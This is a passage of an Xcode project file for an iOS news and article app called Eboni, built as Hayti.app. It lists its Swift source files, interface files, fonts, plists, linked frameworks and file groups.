		18390974263328B500D7FC0A /* QuartzCore.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = QuartzCore.framework; path = System/Library/Frameworks/QuartzCore.framework; sourceTree = SDKROOT; };
		18390976263328C600D7FC0A /* MobileCoreServices.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = MobileCoreServices.framework; path = System/Library/Frameworks/MobileCoreServices.framework; sourceTree = SDKROOT; };
		1839097B263328CF00D7FC0A /* CoreTelephony.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = CoreTelephony.framework; path = System/Library/Frameworks/CoreTelephony.framework; sourceTree = SDKROOT; };
		18390980263328DA00D7FC0A /* CoreVideo.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = CoreVideo.framework; path = System/Library/Frameworks/CoreVideo.framework; sourceTree = SDKROOT; };
		183909B6263329CF00D7FC0A /* CoreServices.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = CoreServices.framework; path = System/Library/Frameworks/CoreServices.framework; sourceTree = SDKROOT; };
		184052FB25680FDD00A77882 /* loginPopupVC.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = loginPopupVC.swift; sourceTree = "<group>"; };
		18451670265E228200B274F0 /* otpViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = otpViewController.swift; sourceTree = "<group>"; };
		184516AA265E345500B274F0 /* changePassViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = changePassViewController.swift; sourceTree = "<group>"; };
		184A65FA257BD6A700CC0089 /* Eboni.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = Eboni.entitlements; sourceTree = "<group>"; };
		184A65FB257BFA3900CC0089 /* allFolderList.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = allFolderList.swift; sourceTree = "<group>"; };
		184AA199265632D00037405F /* Sharing.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = Sharing.swift; sourceTree = "<group>"; };
		184E1FA325873F0B00D7FBAD /* sharePopUpView.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = sharePopUpView.xib; sourceTree = "<group>"; };
		184E1FA525873F2400D7FBAD /* sharePopUpView.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = sharePopUpView.swift; sourceTree = "<group>"; };
		1852527B25C9A7290081DC89 /* GoogleService-Info.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = "GoogleService-Info.plist"; sourceTree = "<group>"; };
		185292B1253D53E1006EB82D /* Hayti.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = Hayti.app; sourceTree = BUILT_PRODUCTS_DIR; };
		185292B4253D53E1006EB82D /* AppDelegate.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = AppDelegate.swift; sourceTree = "<group>"; };
		185292BB253D53E1006EB82D /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = "<group>"; };
		185292BD253D53E5006EB82D /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = "<group>"; };
		185292C0253D53E5006EB82D /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = "<group>"; };
		185292C2253D53E5006EB82D /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
		185292C7253D53E5006EB82D /* EboniTests.xctest */ = {isa = PBXFileReference; explicitFileType = wrapper.cfbundle; includeInIndex = 0; path = EboniTests.xctest; sourceTree = BUILT_PRODUCTS_DIR; };
		185292CB253D53E5006EB82D /* EboniTests.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = EboniTests.swift; sourceTree = "<group>"; };
		185292CD253D53E5006EB82D /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
		185292D2253D53E5006EB82D /* EboniUITests.xctest */ = {isa = PBXFileReference; explicitFileType = wrapper.cfbundle; includeInIndex = 0; path = EboniUITests.xctest; sourceTree = BUILT_PRODUCTS_DIR; };
		185292D6253D53E5006EB82D /* EboniUITests.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = EboniUITests.swift; sourceTree = "<group>"; };
		185292D8253D53E5006EB82D /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
		1858BFD426032D5700F9A204 /* appleButton.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = appleButton.swift; sourceTree = "<group>"; };
		185C34A0265CB78700E9E4BA /* loginByEmailVC.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = loginByEmailVC.swift; sourceTree = "<group>"; };
		185C351D265CF2FE00E9E4BA /* registerViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = registerViewController.swift; sourceTree = "<group>"; };
		185C3588265D155B00E9E4BA /* userExistVC.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = userExistVC.swift; sourceTree = "<group>"; };
		185C358D265D381F00E9E4BA /* forgetPassViewContoller.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = forgetPassViewContoller.swift; sourceTree = "<group>"; };
		185FFD832540336F002F3F1A /* RCustomClass.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = RCustomClass.swift; sourceTree = "<group>"; };
		1865C56925938C620043FAFF /* customLoader.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = customLoader.swift; sourceTree = "<group>"; };
		186DDFAD2556442D0024F681 /* topArticleCell.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = topArticleCell.xib; sourceTree = "<group>"; };
		186DDFAF255644430024F681 /* topArticleCell.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = topArticleCell.swift; sourceTree = "<group>"; };
		1874EFFD25948E86005AFD68 /* open-sans.light.ttf */ = {isa = PBXFileReference; lastKnownFileType = file; path = "open-sans.light.ttf"; sourceTree = "<group>"; };
		1874EFFE25948E86005AFD68 /* open-sans.extrabold.ttf */ = {isa = PBXFileReference; lastKnownFileType = file; path = "open-sans.extrabold.ttf"; sourceTree = "<group>"; };
		1874F0012594D8E9005AFD68 /* imagePickerClass.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = imagePickerClass.swift; sourceTree = "<group>"; };
		18784DF825887EDB00FA2A94 /* sharePopupViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = sharePopupViewController.swift; sourceTree = "<group>"; };
		187DDD2E25697D6900B841B2 /* loginPopUpView.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = loginPopUpView.xib; sourceTree = "<group>"; };
		187DDD3025697D8700B841B2 /* loginPopUpView.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = loginPopUpView.swift; sourceTree = "<group>"; };
		188743A325FA633500963215 /* shareInviteView.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = shareInviteView.xib; sourceTree = "<group>"; };
		188743A825FA634200963215 /* shareInviteView.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = shareInviteView.swift; sourceTree = "<group>"; };
		188743AD25FA640500963215 /* shareInviteViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = shareInviteViewController.swift; sourceTree = "<group>"; };
		188A07F6253FF889002444A4 /* loginViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = loginViewController.swift; sourceTree = "<group>"; };
		188B9A42D9DC1965972F53E1 /* Pods-EboniTests.debug.xcconfig */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = text.xcconfig; name = "Pods-EboniTests.debug.xcconfig"; path = "Target Support Files/Pods-EboniTests/Pods-EboniTests.debug.xcconfig"; sourceTree = "<group>"; };
		188B9C5C2546C6EF00FC188D /* loginModel.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = loginModel.swift; sourceTree = "<group>"; };
		188B9C5D2546C6EF00FC188D /* User_info.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = User_info.swift; sourceTree = "<group>"; };
		188B9C6025472C2500FC188D /* homeViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = homeViewController.swift; sourceTree = "<group>"; };
		188ED1B42555A7D90092D5FA /* top10Model.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = top10Model.swift; sourceTree = "<group>"; };
		188ED1B52555A7D90092D5FA /* AllarticlesLists.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = AllarticlesLists.swift; sourceTree = "<group>"; };
		1890B8DC256D7A59000927F6 /* foldersListViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = foldersListViewController.swift; sourceTree = "<group>"; };
		189B0BA42570A54B00AFBE1A /* aboutViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = aboutViewController.swift; sourceTree = "<group>"; };
		18A03979256EBD45008E561A /* settingsViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = settingsViewController.swift; sourceTree = "<group>"; };
		18A5726026415BAB00A3C074 /* bannerAdsCell.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = bannerAdsCell.xib; sourceTree = "<group>"; };
		18A5729D264188ED00A3C074 /* bannerAdsCell.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = bannerAdsCell.swift; sourceTree = "<group>"; };
		18A60FAB256BE9A300D51D32 /* searchListViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = searchListViewController.swift; sourceTree = "<group>"; };
		18B55D952577E2690009C9B2 /* FolderArticleCell.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = FolderArticleCell.xib; sourceTree = "<group>"; };
		18B55D972577E2850009C9B2 /* FolderArticleCell.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = FolderArticleCell.swift; sourceTree = "<group>"; };
		18B69EF1265FD15C00E7F74C /* signPrivacyVC.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = signPrivacyVC.swift; sourceTree = "<group>"; };
		18BC7A6F258F29AD00F52FA5 /* followingViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = followingViewController.swift; sourceTree = "<group>"; };
		18BC7A72258F505700F52FA5 /* FollowingModel.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = FollowingModel.swift; sourceTree = "<group>"; };
		18BC7A73258F505700F52FA5 /* Top10_channels.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = Top10_channels.swift; sourceTree = "<group>"; };
		18BC7A74258F505700F52FA5 /* Top10_topics.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = Top10_topics.swift; sourceTree = "<group>"; };
		18BFF0C32593404100C847C3 /* allChannelListViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = allChannelListViewController.swift; sourceTree = "<group>"; };
		18BFF0C5259375F400C847C3 /* allPublisherListViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = allPublisherListViewController.swift; sourceTree = "<group>"; };
		18C82EBB2551490B00318BAB /* extensionClass.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = extensionClass.swift; sourceTree = "<group>"; };
		18C82EBD2551754700318BAB /* catModel.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = catModel.swift; sourceTree = "<group>"; };
		18C82EBE2551754800318BAB /* Category_info.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = Category_info.swift; sourceTree = "<group>"; };
		18CB620C262F3A8A00D916C7 /* UnifiedNativeAdCell.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = UnifiedNativeAdCell.xib; sourceTree = "<group>"; };
		18CBFAC8256F7CC1000B7E14 /* privacyTermsViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = privacyTermsViewController.swift; sourceTree = "<group>"; };
		18CBFACA256F7F93000B7E14 /* privacyModel.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = privacyModel.swift; sourceTree = "<group>"; };
		18CBFACC256FE40C000B7E14 /* feedbackViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = feedbackViewController.swift; sourceTree = "<group>"; };
		18CF6BA1257B3C4B00C8D2D9 /* displayFolderCell.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = displayFolderCell.swift; sourceTree = "<group>"; };
		18CF6BA3257B3DF100C8D2D9 /* folderTblListVM.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = folderTblListVM.swift; sourceTree = "<group>"; };
		18CF6BA5257B8EDE00C8D2D9 /* allFolderListModel.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = allFolderListModel.swift; sourceTree = "<group>"; };
		18CFA0B8256397C500CFEBD2 /* detailViewContoller.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = detailViewContoller.swift; sourceTree = "<group>"; };
		18CFA0BA25640E4800CFEBD2 /* publisherListViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = publisherListViewController.swift; sourceTree = "<group>"; };
		18DB5B8025789DF00036B17C /* AllarticlesListsByFolder.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = AllarticlesListsByFolder.swift; sourceTree = "<group>"; };
		18DB5B8125789DF00036B17C /* listByFolder.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = listByFolder.swift; sourceTree = "<group>"; };
		18DB5B8425789F140036B17C /* articleByFolderVC.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = articleByFolderVC.swift; sourceTree = "<group>"; };
		18DB5B862578A2050036B17C /* articleByFolderListVM.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = articleByFolderListVM.swift; sourceTree = "<group>"; };
		18DB5B892578CE460036B17C /* RemoveItemfromFolder.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = RemoveItemfromFolder.xib; sourceTree = "<group>"; };
		18DB5B8B2578CFC20036B17C /* RemoveItemfromFolder.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = RemoveItemfromFolder.swift; sourceTree = "<group>"; };
		18DBD31325596919009370EF /* AllarticlesLists_below.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = AllarticlesLists_below.swift; sourceTree = "<group>"; };
		18DBD3152559A3E2009370EF /* Eboni-Bridging-Header.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = "Eboni-Bridging-Header.h"; sourceTree = "<group>"; };
		18F18FDC2542AA5B00B80791 /* Constant.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = Constant.swift; sourceTree = "<group>"; };
		18F18FDE2542AE2600B80791 /* ApiClient.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = ApiClient.swift; sourceTree = "<group>"; };
		18F6422E25C83DE100007E67 /* credentials.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = credentials.plist; sourceTree = "<group>"; };
		18F6C1E6256A31AC001634FC /* BaseTableViewVM.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = BaseTableViewVM.swift; sourceTree = "<group>"; };
		18F6C1E8256A3258001634FC /* articleListVM.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = articleListVM.swift; sourceTree = "<group>"; };
		18F9B19D25FB90D300FF9A79 /* splashViewController.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = splashViewController.swift; sourceTree = "<group>"; };
		18FA19F42574BAB9006D28DD /* FolderList.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = FolderList.swift; sourceTree = "<group>"; };
		18FA19F62574BAC0006D28DD /* FolderModel.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = FolderModel.swift; sourceTree = "<group>"; };
		18FA19F92574C58C006D28DD /* folderListCell.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = folderListCell.xib; sourceTree = "<group>"; };
		18FA19FB2574D36B006D28DD /* folderListCell.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = folderListCell.swift; sourceTree = "<group>"; };
		18FA19FD2574D655006D28DD /* folderListVM.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = folderListVM.swift; sourceTree = "<group>"; };
		18FA19FF2574D7B2006D28DD /* BaseCollectionViewVM.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = BaseCollectionViewVM.swift; sourceTree = "<group>"; };
		18FA1A0225756138006D28DD /* updateFolder.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = updateFolder.xib; sourceTree = "<group>"; };
		18FA1A042575696C006D28DD /* updateFolder.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = updateFolder.swift; sourceTree = "<group>"; };
		18FDFC4025B70DC100E8F203 /* featuredCell.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = featuredCell.swift; sourceTree = "<group>"; };
		18FDFC4825B70E2200E8F203 /* featuredCell.xib */ = {isa = PBXFileReference; lastKnownFileType = file.xib; path = featuredCell.xib; sourceTree = "<group>"; };
		18FF75172551C055002A1A4E /* BlackHistory_info.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = BlackHistory_info.swift; sourceTree = "<group>"; };
		18FF75182551C055002A1A4E /* blackModel.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = blackModel.swift; sourceTree = "<group>"; };
		1D540FA665BB677A750F7829 /* Pods-EboniTests.release.xcconfig */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = text.xcconfig; name = "Pods-EboniTests.release.xcconfig"; path = "Target Support Files/Pods-EboniTests/Pods-EboniTests.release.xcconfig"; sourceTree = "<group>"; };
		31801D6A3CB5070446DA53C7 /* Pods-Eboni-EboniUITests.debug.xcconfig */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = text.xcconfig; name = "Pods-Eboni-EboniUITests.debug.xcconfig"; path = "Target Support Files/Pods-Eboni-EboniUITests/Pods-Eboni-EboniUITests.debug.xcconfig"; sourceTree = "<group>"; };
		467EF786A88B5F98219DE061 /* Pods_EboniTests.framework */ = {isa = PBXFileReference; explicitFileType = wrapper.framework; includeInIndex = 0; path = Pods_EboniTests.framework; sourceTree = BUILT_PRODUCTS_DIR; };
		58A4F8E10C963FA11BBFB74C /* Pods-Eboni-EboniUITests.release.xcconfig */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = text.xcconfig; name = "Pods-Eboni-EboniUITests.release.xcconfig"; path = "Target Support Files/Pods-Eboni-EboniUITests/Pods-Eboni-EboniUITests.release.xcconfig"; sourceTree = "<group>"; };
		67FABFC94C1C5C6912A17BE4 /* Pods-Eboni.debug.xcconfig */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = text.xcconfig; name = "Pods-Eboni.debug.xcconfig"; path = "Target Support Files/Pods-Eboni/Pods-Eboni.debug.xcconfig"; sourceTree = "<group>"; };
		76DDA9A0F6EAA2110B074662 /* Pods-Eboni.release.xcconfig */ = {isa = PBXFileReference; includeInIndex = 1; lastKnownFileType = text.xcconfig; name = "Pods-Eboni.release.xcconfig"; path = "Target Support Files/Pods-Eboni/Pods-Eboni.release.xcconfig"; sourceTree = "<group>"; };
		9D57E68C477CEF3224389589 /* Pods_Eboni.framework */ = {isa = PBXFileReference; explicitFileType = wrapper.framework; includeInIndex = 0; path = Pods_Eboni.framework; sourceTree = BUILT_PRODUCTS_DIR; };
/* End PBXFileReference section */

/* Begin PBXFrameworksBuildPhase section */
		185292AE253D53E1006EB82D /* Frameworks */ = {
			isa = PBXFrameworksBuildPhase;
			buildActionMask = 2147483647;
			files = (
				18390981263328DB00D7FC0A /* CoreVideo.framework in Frameworks */,
				1839097C263328CF00D7FC0A /* CoreTelephony.framework in Frameworks */,
				18390975263328B500D7FC0A /* QuartzCore.framework in Frameworks */,
				18390973263328AB00D7FC0A /* SystemConfiguration.framework in Frameworks */,
				18390971263328A100D7FC0A /* WebKit.framework in Frameworks */,
				1839096C2633289700D7FC0A /* libz.tbd in Frameworks */,
				1839096A2633288400D7FC0A /* CoreMedia.framework in Frameworks */,
				183909682633287300D7FC0A /* CoreGraphics.framework in Frameworks */,
				183909662633286C00D7FC0A /* Security.framework in Frameworks */,
				183909642633286600D7FC0A /* AVFoundation.framework in Frameworks */,
				C9FEAD82C7FA04E974E97AE2 /* Pods_Eboni.framework in Frameworks */,
				183909B7263329CF00D7FC0A /* CoreServices.framework in Frameworks */,
				183909622633284500D7FC0A /* UXCam.framework in Frameworks */,
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
		185292C4253D53E5006EB82D /* Frameworks */ = {
			isa = PBXFrameworksBuildPhase;
			buildActionMask = 2147483647;
			files = (
				51098920020E545939A3FD33 /* Pods_EboniTests.framework in Frameworks */,
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
		185292CF253D53E5006EB82D /* Frameworks */ = {
			isa = PBXFrameworksBuildPhase;
			buildActionMask = 2147483647;
			files = (
				BFEE730192851BF7A0E0B36B /* Pods_Eboni_EboniUITests.framework in Frameworks */,
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
/* End PBXFrameworksBuildPhase section */

/* Begin PBXGroup section */
		180AE1AC2556CB3200153137 /* ArticleList */ = {
			isa = PBXGroup;
			children = (
				180AE1AD2556CB5600153137 /* articleListCell.xib */,
				180AE1B32556D07500153137 /* articleListCell.swift */,
			);
			path = ArticleList;
			sourceTree = "<group>";
		};
		180E1261259077CA00C9D46A /* TopTopicsCell */ = {
			isa = PBXGroup;
			children = (
				180E1262259077D600C9D46A /* TopTopicsCell.xib */,
				180E1264259077E100C9D46A /* TopTopicsCell.swift */,
			);
			path = TopTopicsCell;
			sourceTree = "<group>";
		};
		180E12662590872B00C9D46A /* CustomfollowingHeaderview */ = {
			isa = PBXGroup;
			children = (
				180E12672590874200C9D46A /* CustomfollowingHeaderview.xib */,
				180E12692590875600C9D46A /* CustomfollowingHeaderview.swift */,
			);
			path = CustomfollowingHeaderview;
			sourceTree = "<group>";
		};
		180E126B2590935000C9D46A /* TopChannelCell */ = {
			isa = PBXGroup;
			children = (
				180E126C2590936A00C9D46A /* TopChannelCell.xib */,
				180E126E2590937300C9D46A /* TopChannelCell.swift */,
			);
			path = TopChannelCell;
			sourceTree = "<group>";
		};
		180E12722590FC1F00C9D46A /* OpenSans */ = {
			isa = PBXGroup;
			children = (
				1874EFFE25948E86005AFD68 /* open-sans.extrabold.ttf */,
				1874EFFD25948E86005AFD68 /* open-sans.light.ttf */,
				1808DFDD25939CDE00FADA22 /* open-sans.semibold.ttf */,
				1808DFDB25939CD600FADA22 /* open-sans.regular.ttf */,
				1808DFD925939CCD00FADA22 /* open-sans.bold.ttf */,
			);
			path = OpenSans;
			sourceTree = "<group>";
		};
		1812C9C12579FE710035C5C4 /* Folder */ = {
			isa = PBXGroup;
			children = (
				1812C9C22579FE8E0035C5C4 /* createFolderViewController.swift */,
				1838740225EF7C05001A3806 /* addFolderVC.swift */,
			);
			path = Folder;
			sourceTree = "<group>";
		};
		1812C9C42579FED70035C5C4 /* CreateFolderPopUp */ = {
			isa = PBXGroup;
			children = (
				1812C9C52579FEE90035C5C4 /* CreateFolderPopUp.xib */,
				1812C9C72579FEF40035C5C4 /* CreateFolderPopUp.swift */,
			);
			path = CreateFolderPopUp;
			sourceTree = "<group>";
		};
		1812C9C9257A0BF30035C5C4 /* displayFolderCell */ = {
			isa = PBXGroup;
			children = (
				1812C9CA257A0C1F0035C5C4 /* displayFolderCell.xib */,
				18CF6BA1257B3C4B00C8D2D9 /* displayFolderCell.swift */,
			);
			path = displayFolderCell;
			sourceTree = "<group>";
		};
		184E1FA225873EDB00D7FBAD /* SharePopUp */ = {
			isa = PBXGroup;
			children = (
				184E1FA325873F0B00D7FBAD /* sharePopUpView.xib */,
				184E1FA525873F2400D7FBAD /* sharePopUpView.swift */,
			);
			path = SharePopUp;
			sourceTree = "<group>";
		};
		185292A8253D53E1006EB82D = {
			isa = PBXGroup;
			children = (
				185292B3253D53E1006EB82D /* Eboni */,
				185292CA253D53E5006EB82D /* EboniTests */,
				185292D5253D53E5006EB82D /* EboniUITests */,
				185292B2253D53E1006EB82D /* Products */,
				37FAC02B53F64C6C42651CAB /* Pods */,
				5960569964475900732D4F28 /* Frameworks */,
			);
			sourceTree = "<group>";
		};
		185292B2253D53E1006EB82D /* Products */ = {
			isa = PBXGroup;
			children = (
				185292B1253D53E1006EB82D /* Hayti.app */,
				185292C7253D53E5006EB82D /* EboniTests.xctest */,
				185292D2253D53E5006EB82D /* EboniUITests.xctest */,
			);
			name = Products;
			sourceTree = "<group>";
		};
		185292B3253D53E1006EB82D /* Eboni */ = {
			isa = PBXGroup;
			children = (
				183909612633284500D7FC0A /* UXCam.framework */,
				184A65FA257BD6A700CC0089 /* Eboni.entitlements */,
				188B9C5B2546C5AA00FC188D /* View */,
				188B9C562546BE0A00FC188D /* Model */,
				188B9C5A2546C58100FC188D /* ViewModel */,
				18F18FDB2542AA3700B80791 /* Services */,
				185FFD8225403324002F3F1A /* Helper */,
				188A07F5253FF85E002444A4 /* Controller */,
				185292B4253D53E1006EB82D /* AppDelegate.swift */,
				185292BA253D53E1006EB82D /* Main.storyboard */,
				185292BD253D53E5006EB82D /* Assets.xcassets */,
				185292BF253D53E5006EB82D /* LaunchScreen.storyboard */,
				185292C2253D53E5006EB82D /* Info.plist */,
				18DBD3152559A3E2009370EF /* Eboni-Bridging-Header.h */,
			);
			path = Eboni;
			sourceTree = "<group>";
		};
		185292CA253D53E5006EB82D /* EboniTests */ = {
			isa = PBXGroup;
			children = (
				185292CB253D53E5006EB82D /* EboniTests.swift */,
				185292CD253D53E5006EB82D /* Info.plist */,
			);
			path = EboniTests;
			sourceTree = "<group>";
		};
		185292D5253D53E5006EB82D /* EboniUITests */ = {
			isa = PBXGroup;
			children = (
				185292D6253D53E5006EB82D /* EboniUITests.swift */,
				185292D8253D53E5006EB82D /* Info.plist */,
			);
			path = EboniUITests;
			sourceTree = "<group>";
		};
		185FFD8225403324002F3F1A /* Helper */ = {
			isa = PBXGroup;
			children = (
				1852527B25C9A7290081DC89 /* GoogleService-Info.plist */,
				18F6422E25C83DE100007E67 /* credentials.plist */,
				1874F0012594D8E9005AFD68 /* imagePickerClass.swift */,
				185FFD832540336F002F3F1A /* RCustomClass.swift */,
				18C82EBB2551490B00318BAB /* extensionClass.swift */,
				182A50B025545CF300D5D040 /* Colors.swift */,
				1865C56925938C620043FAFF /* customLoader.swift */,
				18233B6825CACC8A007E35FA /* PushNotificationManager.swift */,
			);
			path = Helper;
			sourceTree = "<group>";
		};
		186DDFAB2556438A0024F681 /* xib */ = {
			isa = PBXGroup;
			children = (
				18CB620B262F3A6D00D916C7 /* unifiedNativeAdCell */,
				1887439C25FA631900963215 /* shareInviteView */,
				18FDFC3C25B70D9100E8F203 /* FeaturedCell */,
				180E126B2590935000C9D46A /* TopChannelCell */,
				180E12662590872B00C9D46A /* CustomfollowingHeaderview */,
				180E1261259077CA00C9D46A /* TopTopicsCell */,
				184E1FA225873EDB00D7FBAD /* SharePopUp */,
				1812C9C9257A0BF30035C5C4 /* displayFolderCell */,
				1812C9C42579FED70035C5C4 /* CreateFolderPopUp */,
				18DB5B882578CE200036B17C /* RemoveItemfromFolder */,
				18B55D942577E2480009C9B2 /* FolderArticleCell */,
				18FA1A01257560F0006D28DD /* updateFolder */,
				18FA19F82574BFAC006D28DD /* FolderListCell */,
				187DDD2D25697D4000B841B2 /* loginPopUp */,
				180AE1AC2556CB3200153137 /* ArticleList */,
				186DDFAC2556439F0024F681 /* Top10Article */,
			);
			path = xib;
			sourceTree = "<group>";
		};
		186DDFAC2556439F0024F681 /* Top10Article */ = {
			isa = PBXGroup;
			children = (
				186DDFAD2556442D0024F681 /* topArticleCell.xib */,
				186DDFAF255644430024F681 /* topArticleCell.swift */,
			);
			path = Top10Article;
			sourceTree = "<group>";
		};
		187DDD2D25697D4000B841B2 /* loginPopUp */ = {
			isa = PBXGroup;
			children = (
				187DDD2E25697D6900B841B2 /* loginPopUpView.xib */,
				187DDD3025697D8700B841B2 /* loginPopUpView.swift */,
			);
			path = loginPopUp;
			sourceTree = "<group>";
		};
		1887439C25FA631900963215 /* shareInviteView */ = {
			isa = PBXGroup;
			children = (
				188743A325FA633500963215 /* shareInviteView.xib */,
